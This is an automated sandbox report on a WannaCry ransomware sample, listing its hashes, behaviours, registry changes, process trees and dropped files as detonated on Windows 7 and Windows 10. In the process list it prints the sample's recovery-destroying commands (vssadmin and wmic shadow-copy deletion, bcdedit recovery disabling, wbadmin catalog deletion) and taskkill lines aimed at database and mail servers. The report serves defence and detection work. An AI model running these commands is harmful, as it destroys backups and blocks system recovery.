Malware Analysis Report

2025-03-15 08:19

Sample ID 241020-xh927swdqr
Target WannaCry.exe
SHA256 be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844
Tags
wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

Threat Level: Known bad

The file WannaCry.exe was found to be: Known bad.

Malicious Activity Summary

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Wannacry

Deletes shadow copies

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Executes dropped EXE

Adds Run key to start application

Sets desktop wallpaper using registry

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-20 18:52

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-20 18:52

Reported

2024-10-20 18:53

Platform

win7-20240903-en

Max time kernel

29s

Max time network

17s

Command Line

"C:\Users\Admin\AppData\Local\Temp\WannaCry.exe"

Signatures

Wannacry

ransomware worm wannacry

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD6290.tmp | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\WannaCry.exe\" /r" | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp" | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\My Wallpaper.jpg" | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\vssadmin.exe | N/A

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2692 wrote to memory of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2508 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cscript.exe
PID 2796 wrote to memory of 2508 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cscript.exe
PID 2796 wrote to memory of 2508 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cscript.exe
PID 2796 wrote to memory of 2508 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cscript.exe
PID 2692 wrote to memory of 2672 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2672 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2672 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2672 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2096 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2096 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2096 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2096 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2156 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2156 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2156 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2156 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2204 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2204 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2204 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2204 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2260 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2204 wrote to memory of 2260 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2204 wrote to memory of 2260 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2204 wrote to memory of 2260 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2284 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2284 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2284 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2284 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2260 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | C:\Windows\SysWOW64\cmd.exe
PID 2260 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | C:\Windows\SysWOW64\cmd.exe
PID 2260 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | C:\Windows\SysWOW64\cmd.exe
PID 2260 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | C:\Windows\SysWOW64\cmd.exe
PID 2152 wrote to memory of 672 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\vssadmin.exe
PID 2152 wrote to memory of 672 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\vssadmin.exe
PID 2152 wrote to memory of 672 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\vssadmin.exe
PID 2152 wrote to memory of 672 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\vssadmin.exe
PID 2152 wrote to memory of 1820 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2152 wrote to memory of 1820 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2152 wrote to memory of 1820 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2152 wrote to memory of 1820 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\WannaCry.exe

"C:\Users\Admin\AppData\Local\Temp\WannaCry.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c 199441729450364.bat

C:\Windows\SysWOW64\cscript.exe

cscript //nologo c.vbs

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im MSExchange*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Microsoft.Exchange.*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sqlserver.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sqlwriter.exe

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe c

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b !WannaDecryptor!.exe v

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe v

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

Network

Country | Destination | Domain | Proto
N/A | 127.0.0.1:9050 | | tcp
N/A | 127.0.0.1:9150 | | tcp
N/A | 127.0.0.1:9050 | | tcp
N/A | 127.0.0.1:9150 | | tcp
N/A | 127.0.0.1:9050 | | tcp
N/A | 127.0.0.1:9150 | | tcp
N/A | 127.0.0.1:9050 | | tcp
N/A | 127.0.0.1:9150 | | tcp
N/A | 127.0.0.1:9050 | | tcp
N/A | 127.0.0.1:9150 | | tcp
N/A | 127.0.0.1:9050 | | tcp
N/A | 127.0.0.1:9150 | | tcp

Files

memory/2692-6-0x0000000010000000-0x0000000010012000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\199441729450364.bat

MD5 3540e056349c6972905dc9706cd49418
SHA1 492c20442d34d45a6d6790c720349b11ec591cde
SHA256 73872a89440a2cba9d22bf4961c3d499ea2c72979c30c455f942374292fedadc
SHA512 c949d147100aef59e382c03abf7b162ae62a4d43456eebd730fbedcf5f95f5e1a24f6e349690d52d75331878a6ee8f6b88a7162ee9cf2a49e142196b12d0133c

C:\Users\Admin\AppData\Local\Temp\c.vbs

MD5 5f6d40ca3c34b470113ed04d06a88ff4
SHA1 50629e7211ae43e32060686d6be17ebd492fd7aa
SHA256 0fb5039a2fe7e90cdf3f22140d7f2103f94689b15609efe0edcc8430dd772fc1
SHA512 4d4aa1abd2c9183202fd3f0a65b37f07ee0166ba6561f094c13c8ea59752c7bdd960e37c49583746d4464bc3b1dc0b63a1fe36a37ce7e5709cd76ed433befe35

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

MD5 cf1416074cd7791ab80a18f9e7e219d9
SHA1 276d2ec82c518d887a8a3608e51c56fa28716ded
SHA256 78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df
SHA512 0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe.lnk

MD5 3fda739a358c37ea2076ce1e607d0fde
SHA1 0cbdedc919885e77a89cacf172c3d4e87990bf62
SHA256 2d1c8bbf2b0ee5b0d987405353825d9b6b384b54e438dcf7f6732d1d301374d3
SHA512 8c411a9523d54d7d39b74bf0d2b11f11c0854ecf53ede193bf4b1c21dc1182ac2dbe30be90eb7bdc44e50d75505a31b4ae6ef82462ecbb061f90dcd3c1f5ae26

C:\Users\Admin\AppData\Local\Temp\c.wry

MD5 d5826e36a887bf8a4905d3a7df12f8e6
SHA1 b208d89da4bcc9ba38db50f90513e5cff818f1de
SHA256 9e436a4f8eae5ed4836d9883c572612ae11d15761a430d0eae314d96a43ea081
SHA512 b2fb4e33571cbc1b424e9c2b36fbc1c7f8564b00a92df6fb335f8252fdcf5a05dc690de86d762f6e075cf735770d7935f8e3404c2ccb2dda5daef49e1432bdb1

C:\Users\Admin\AppData\Local\Temp\00000000.res

MD5 ed5ab9da13d83bdc391e46465ab4bc17
SHA1 55318809c719624b2fc7964176f2edf38b49f8a0
SHA256 cf2401ebba6104fdcf797a0fc7c2d954b740f2cb529a89b72e784d85a633c543
SHA512 d8bad336070998ecdca1e3a33cca8f02c9943d8f88d3a30e81dfd9d183501b9bc1348125e3b112cb55fb74d10916b1954f1c20410989e0e9b298f2cc32365dcd

C:\Users\Admin\Documents\!Please Read Me!.txt

MD5 afa18cf4aa2660392111763fb93a8c3d
SHA1 c219a3654a5f41ce535a09f2a188a464c3f5baf5
SHA256 227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0
SHA512 4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

C:\Users\Admin\AppData\Local\Temp\00000000.res

MD5 62812f4b112376d366f4a28d1c218cf1
SHA1 e891625e52d04af5989bf453db4aaa12b09b7d3f
SHA256 421b6bcf1be52768a79e71944d889b19bb8f73941fbef6940fb51690b278f9e2
SHA512 17ecf88ac0be2c6ebb2b6ce42705c3f0e101da77ea1914c57a3298b725fc74db448580be4a44b0e15c55d4ecbbe5bfaa15f24e3eec0b280e6ca96efa33d0520d

C:\Users\Admin\AppData\Local\Temp\m.wry

MD5 980b08bac152aff3f9b0136b616affa5
SHA1 2a9c9601ea038f790cc29379c79407356a3d25a3
SHA256 402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9
SHA512 100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496

C:\Users\Admin\AppData\Local\Temp\00000000.res

MD5 31c4681a11006590913153dd14906699
SHA1 6e7678e716f27552698e008c0b2c97ea6ead5a5b
SHA256 1cccef862e69ad81ecd62dfbba6daad0f786b261fe52104852f3b6cf3d12df99
SHA512 1e4802c6e9c52ee4522d2a66d6c03f0490065c84e298cc8f5b08e64d6ee5407c672a790570634507fdb01874926b56616519a895f8a0431f2084f488b20a050f

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-20 18:52

Reported

2024-10-20 18:53

Platform

win10v2004-20241007-en

Max time kernel

30s

Max time network

31s

Command Line

"C:\Users\Admin\AppData\Local\Temp\WannaCry.exe"

Signatures

Wannacry

ransomware worm wannacry

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDAAC9.tmp | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDAAEF.tmp | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\WannaCry.exe\" /r" | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp" | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
